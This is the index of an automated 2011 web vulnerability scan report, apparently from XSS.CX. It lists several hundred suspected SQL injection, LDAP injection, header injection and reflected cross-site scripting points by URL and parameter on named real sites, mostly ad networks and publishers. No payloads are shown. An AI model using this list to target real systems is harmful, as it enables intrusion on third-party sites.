CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Report generated by XSS.CX at Mon May 02 17:44:31 CDT 2011.

1. SQL injection

1.1. http://ads2.adbrite.com/v0/ad [name of an arbitrarily supplied request parameter]

1.2. http://ads2.adbrite.com/v0/ad [zs parameter]

1.3. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.4. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.5. http://cr0.worthathousandwords.com/8/B0/97/12F97D19102C47E09DCCA28EA33.jpg [REST URL parameter 3]

1.6. http://cr0.worthathousandwords.com/8/B0/97/12F97D19102C47E09DCCA28EA33.jpg [pid parameter]

1.7. http://cr0.worthathousandwords.com/C/AE/42/DF69B0E03BBF9D28DDBF2CEA27A.jpg [REST URL parameter 3]

1.8. https://customer.trizetto.com/OnyxCustomerPortal/home.asp [ASPSESSIONIDQSASBQTR cookie]

1.9. http://designers.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.10. http://entertainment.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

1.12. http://living.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.13. http://loadus.exelator.com/load/ [p parameter]

1.14. http://map.media6degrees.com/orbserv/aopix [acs cookie]

1.15. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 1]

1.16. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 2]

1.17. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 3]

1.18. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 4]

1.19. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [name of an arbitrarily supplied request parameter]

1.20. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]

1.21. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]

1.22. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 3]

1.23. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 4]

1.24. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [name of an arbitrarily supplied request parameter]

1.25. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [keyword parameter]

1.26. http://www.facebook.com/plugins/activity.php [datr cookie]

1.27. http://www.facebook.com/plugins/facepile.php [datr cookie]

1.28. http://www.glam.com/profile [__utma cookie]

1.29. http://www.glam.com/register [__utmz cookie]

1.30. http://www.glam.com/register [qcsegs cookie]

1.31. http://www.glam.com/topic/feed/ [REST URL parameter 1]

1.32. http://www.glam.com/topic/feed/ [name of an arbitrarily supplied request parameter]

1.33. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.34. http://www.wiseshop.com/shop.php [name of an arbitrarily supplied request parameter]

1.35. http://www2.idexpertscorp.com/blog [exp_super_search_history cookie]

1.36. http://www2.idexpertscorp.com/blog/ [exp_super_search_history cookie]

1.37. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/ [exp_super_search_history cookie]

1.38. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification [exp_super_search_history cookie]

1.39. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/ [exp_super_search_history cookie]

1.40. http://www2.idexpertscorp.com/breach-tools [exp_super_search_history cookie]

1.41. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/ [exp_super_search_history cookie]

1.42. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/ [exp_super_search_history cookie]

1.43. http://www2.idexpertscorp.com/contact [exp_super_search_history cookie]

2. File path traversal

3. LDAP injection

3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

3.2. http://data.cmcore.com/imp [ci parameter]

4. XPath injection

5. HTTP header injection

5.1. http://ad.doubleclick.net/crossdomain.xml [REST URL parameter 1]

5.2. http://amch.questionmarket.com/adsc/d724925/18/725047/adscout.php [ES cookie]

5.3. http://amch.questionmarket.com/adsc/d724925/9/725047/adscout.php [ES cookie]

5.4. http://bidder.mathtag.com/iframe/notify [exch parameter]

5.5. http://clickserve.cc-dt.com/link/tplimage [lid parameter]

5.6. http://clickserve.cc-dt.com/link/tplimage [pubid parameter]

5.7. http://rd.apmebf.com/w/get.media [REST URL parameter 1]

5.8. http://rd.apmebf.com/w/get.media [REST URL parameter 2]

5.9. http://rd.apmebf.com/w/get.media [S cookie]

5.10. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

6. Cross-site scripting (reflected)

6.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

6.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

6.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

6.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

6.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

6.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

6.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

6.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

6.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

6.10. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 2]

6.11. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 3]

6.12. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 4]

6.13. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [anx parameter]

6.14. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [name of an arbitrarily supplied request parameter]

6.15. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]

6.16. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]

6.17. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]

6.18. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 1]

6.19. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 2]

6.20. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 3]

6.21. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 4]

6.22. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [anx parameter]

6.23. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [&PID parameter]

6.24. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [&PID parameter]

6.25. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [AN parameter]

6.26. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [AN parameter]

6.27. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [ASID parameter]

6.28. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [ASID parameter]

6.29. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [PG parameter]

6.30. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [PG parameter]

6.31. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [TargetID parameter]

6.32. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [TargetID parameter]

6.33. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [UIT parameter]

6.34. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [UIT parameter]

6.35. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [destination parameter]

6.36. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [destination parameter]

6.37. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [sz parameter]

6.38. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [sz parameter]

6.39. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [campID parameter]

6.40. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [crID parameter]

6.41. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [partnerID parameter]

6.42. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [pub parameter]

6.43. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [pubICode parameter]

6.44. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [sz parameter]

6.45. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [url parameter]

6.46. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [campID parameter]

6.47. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [crID parameter]

6.48. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [partnerID parameter]

6.49. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [pub parameter]

6.50. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [pubICode parameter]

6.51. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [sz parameter]

6.52. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [url parameter]

6.53. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [campID parameter]

6.54. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [crID parameter]

6.55. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [partnerID parameter]

6.56. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [pub parameter]

6.57. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [pubICode parameter]

6.58. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [sz parameter]

6.59. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [url parameter]

6.60. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [campID parameter]

6.61. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [crID parameter]

6.62. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [partnerID parameter]

6.63. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [pub parameter]

6.64. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [pubICode parameter]

6.65. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [sz parameter]

6.66. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [url parameter]

6.67. http://ad.doubleclick.net/adj/mcn.skynews.com.au/topstories [tile parameter]

6.68. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 2]

6.69. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 3]

6.70. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 4]

6.71. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [name of an arbitrarily supplied request parameter]

6.72. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [sz parameter]

6.73. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 2]

6.74. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 3]

6.75. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 4]

6.76. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [name of an arbitrarily supplied request parameter]

6.77. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [sz parameter]

6.78. http://ad.turn.com/server/pixel.htm [fpid parameter]

6.79. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

6.80. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

6.81. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

6.82. http://ads.adbrite.com/adserver/vdi/712156 [REST URL parameter 3]

6.83. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

6.84. http://ads.adbrite.com/adserver/vdi/753292 [REST URL parameter 3]

6.85. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

6.86. http://ads.adbrite.com/adserver/vdi/810647 [REST URL parameter 3]

6.87. http://ads.adbrite.com/adserver/vdi/830697 [REST URL parameter 3]

6.88. http://ads.adxpose.com/ads/ads.js [uid parameter]

6.89. http://ads.shopstyle.com/ [cat parameter]

6.90. http://ads.shopstyle.com/ [color parameter]

6.91. http://ads.shopstyle.com/ [name of an arbitrarily supplied request parameter]

6.92. http://ads.shopstyle.com/ [pid parameter]

6.93. http://ads.shopstyle.com/ [size parameter]

6.94. http://ads.shopstyle.com/ [v parameter]

6.95. http://ads.shopstyle.com/sugar-ads/ism/data/ [REST URL parameter 2]

6.96. http://ads.shopstyle.com/sugar-ads/ism/data/ [REST URL parameter 2]

6.97. http://ads.shopstyle.com/sugar-ads/ism/data/ [REST URL parameter 3]

6.98. http://ads.shopstyle.com/sugar-ads/ism/data/ [pid parameter]

6.99. http://ads.shopstyle.com/sugar-ads/ism/js/ [REST URL parameter 2]

6.100. http://ads.shopstyle.com/sugar-ads/ism/js/ [REST URL parameter 2]

6.101. http://ads.shopstyle.com/sugar-ads/ism/js/ [REST URL parameter 3]

6.102. http://ads.specificmedia.com/serve/v=5 [m parameter]

6.103. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

6.104. http://adserving.cpxinteractive.com/st [ad_size parameter]

6.105. http://adserving.cpxinteractive.com/st [section parameter]

6.106. http://adsfac.us/ag.asp [cc parameter]

6.107. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11 [mpt parameter]

6.108. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11 [mpvc parameter]

6.109. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11 [name of an arbitrarily supplied request parameter]

6.110. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5 [mpt parameter]

6.111. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5 [mpvc parameter]

6.112. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5 [name of an arbitrarily supplied request parameter]

6.113. http://api.shopstyle.com/action/apiSearch [fl parameter]

6.114. http://api.shopstyle.com/action/apiSearch [pid parameter]

6.115. http://api.trulia.com/getListings.php [city parameter]

6.116. http://api.trulia.com/getListings.php [listingType parameter]

6.117. http://api.trulia.com/getListings.php [page%5Fnumber parameter]

6.118. http://api.trulia.com/getListings.php [page%5Fsize parameter]

6.119. http://api.trulia.com/getListings.php [sort%5Fdesc parameter]

6.120. http://api.trulia.com/getListings.php [state parameter]

6.121. http://ar.voicefive.com/b/rc.pli [func parameter]

6.122. https://auth.tek.com/mytek/faces/loginregistration.jsp [rlc parameter]

6.123. http://celebrities.glam.com/topic/ [searchTerm parameter]

6.124. http://celebrities.glam.com/topic/ [searchTerm parameter]

6.125. http://choices.truste.com/ca [c parameter]

6.126. http://choices.truste.com/ca [h parameter]

6.127. http://choices.truste.com/ca [iplc parameter]

6.128. http://choices.truste.com/ca [ox parameter]

6.129. http://choices.truste.com/ca [plc parameter]

6.130. http://choices.truste.com/ca [w parameter]

6.131. http://choices.truste.com/ca [zi parameter]

6.132. http://REDACTED/js_1_0/ [css_url parameter]

6.133. https://customer.trizetto.com/OnyxCustomerPortal/login.asp [name of an arbitrarily supplied request parameter]

6.134. https://customer.trizetto.com/OnyxCustomerPortal/login.asp [name of an arbitrarily supplied request parameter]

6.135. http://cx.trizetto.com/ [name of an arbitrarily supplied request parameter]

6.138. http://delb.opt.fimserve.com/adopt/ [name of an arbitrarily supplied request parameter]

6.139. http://delb.opt.fimserve.com/adopt/ [pclick parameter]

6.140. http://delb.opt.fimserve.com/adopt/ [sz parameter]

6.141. http://ds.addthis.com/red/psi/sites/www.infocrossing.com/p.json [callback parameter]

6.142. http://ds.addthis.com/red/psi/sites/www.islandpacket.com/p.json [callback parameter]

6.143. http://engine.cmmeglobal.com/v1/request [maid parameter]

6.144. http://enjmp.com/links/ [kw parameter]

6.145. http://enjmp.com/links/health-insurancemgr.php [hl parameter]

6.146. http://enjmp.com/links/health-insurancemgr.php [kw parameter]

6.147. http://enjmp.com/links/health-insurancemgr.php [name of an arbitrarily supplied request parameter]

6.148. http://event.adxpose.com/event.flow [uid parameter]

6.149. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1895483445 [REST URL parameter 1]

6.150. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1895483445 [callback parameter]

6.151. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1895483445 [name of an arbitrarily supplied request parameter]

6.152. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1905619982 [REST URL parameter 1]

6.153. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1905619982 [callback parameter]

6.154. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1905619982 [name of an arbitrarily supplied request parameter]

6.155. http://flash.quantserve.com/quant.swf [lc parameter]

6.156. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj [REST URL parameter 1]

6.157. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj [REST URL parameter 2]

6.158. http://ib.adnxs.com/ab [cnd parameter]

6.159. http://ib.adnxs.com/ptj [redir parameter]

6.160. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js [mpck parameter]

6.161. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js [mpck parameter]

6.162. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js [mpvc parameter]

6.163. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js [mpvc parameter]

6.164. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js [mpck parameter]

6.165. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js [mpck parameter]

6.166. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js [mpvc parameter]

6.167. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js [mpvc parameter]

6.168. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js [mpck parameter]

6.169. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js [mpck parameter]

6.170. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js [mpvc parameter]

6.171. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js [mpvc parameter]

6.172. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js [mpck parameter]

6.173. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js [mpck parameter]

6.174. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js [mpvc parameter]

6.175. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js [mpvc parameter]

6.176. http://img.mediaplex.com/content/0/6726/112732/ARNG_NPS-PR_Comp05-728x90.js [mpck parameter]

6.177. http://img.mediaplex.com/content/0/6726/112732/ARNG_NPS-PR_Comp05-728x90.js [mpvc parameter]

6.178. http://js.revsci.net/gateway/gw.js [csid parameter]

6.179. http://js.worthathousandwords.com/IA.jsh [pid parameter]

6.180. http://k.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]

6.181. http://mf.sitescout.com/tag.jsp [h parameter]

6.182. http://mf.sitescout.com/tag.jsp [pid parameter]

6.183. http://mf.sitescout.com/tag.jsp [w parameter]

6.184. http://mm.chitika.net/minimall [callback parameter]

6.185. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS [REST URL parameter 1]

6.186. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS [REST URL parameter 2]

6.187. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS [REST URL parameter 3]

6.188. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS [REST URL parameter 4]

6.189. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 1]

6.190. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 2]

6.191. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 3]

6.192. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 4]

6.193. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]

6.194. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]

6.195. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 3]

6.196. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 4]

6.197. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [PID parameter]

6.198. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [callback parameter]

6.199. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [endIndex parameter]

6.200. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [query parameter]

6.201. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [startIndex parameter]

6.202. http://nmp.newsgator.com/ngbuzz/buzz.ashx [buzzId parameter]

6.203. http://nmp.newsgator.com/ngbuzz/buzz.ashx [name of an arbitrarily supplied request parameter]

6.204. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

6.205. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

6.206. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [REST URL parameter 4]

6.207. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [REST URL parameter 6]

6.208. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [callback parameter]

6.209. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [container parameter]

6.210. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251 [REST URL parameter 6]

6.211. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251 [callback parameter]

6.212. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251 [container parameter]

6.213. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

6.214. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

6.215. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

6.216. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

6.217. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

6.218. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

6.219. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

6.220. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

6.221. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

6.222. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

6.223. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

6.224. http://webservice.theweather.com.au/ws1/wx.php [fc parameter]

6.225. http://widget.linkwithin.com/get_custom_js [callback parameter]

6.226. http://widget.linkwithin.com/show_widget [callback parameter]

6.227. http://widget2.linkwithin.com/get_custom_js [callback parameter]

6.228. http://widget2.linkwithin.com/show_widget [callback parameter]

6.229. http://widgets.digg.com/buttons/count [url parameter]

6.230. http://www.glam.de/ [name of an arbitrarily supplied request parameter]

6.231. http://www.glam.de/ [name of an arbitrarily supplied request parameter]

6.232. http://www.linkedin.com/cws/share-count [url parameter]

6.233. http://www.news14charlotte.com/images/video/cart_play.gif [name of an arbitrarily supplied request parameter]

6.234. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

6.235. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

6.236. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

6.237. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

6.238. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]

6.239. http://www.righthealth.com/images/mpv.txt [REST URL parameter 1]

6.240. http://www.righthealth.com/images/mpv.txt [REST URL parameter 2]

6.241. http://www.righthealth.com/images/mpv.txt [REST URL parameter 2]

6.242. http://www.righthealth.com/images/pv.txt [REST URL parameter 1]

6.243. http://www.righthealth.com/images/pv.txt [REST URL parameter 2]

6.244. http://www.righthealth.com/images/pv.txt [REST URL parameter 2]

6.245. http://www.righthealth.com/images/pv.txt [REST URL parameter 2]

6.246. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 2]

6.247. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 2]

6.248. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 2]

6.249. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 3]

6.250. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 3]

6.251. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js [REST URL parameter 1]

6.252. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js [REST URL parameter 2]

6.253. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js [REST URL parameter 2]

6.254. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js [REST URL parameter 1]

6.255. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js [REST URL parameter 2]

6.256. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js [REST URL parameter 2]

6.257. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css [REST URL parameter 1]

6.258. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css [REST URL parameter 2]

6.259. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css [REST URL parameter 2]

6.260. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 1]

6.261. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 2]

6.262. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 2]

6.263. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 2]

6.264. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 2]

6.265. http://www.righthealth.com/topic/What_Is_Hipaa [ac parameter]

6.266. http://www.righthealth.com/topic/What_Is_Hipaa [as parameter]

6.267. http://www.righthealth.com/topic/What_Is_Hipaa [as parameter]

6.268. http://www.righthealth.com/topic/What_Is_Hipaa [kgl parameter]

6.269. http://www.righthealth.com/topic/What_Is_Hipaa [name of an arbitrarily supplied request parameter]

6.270. http://www.righthealth.com/topic/What_Is_Hipaa [p parameter]

6.271. http://www.strausnews.com/shared-content/myweather/weather.php [magnet_style parameter]

6.272. http://www.strausnews.com/shared-content/myweather/weather.php [zipcode parameter]

6.273. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 10]

6.274. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 11]

6.275. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 12]

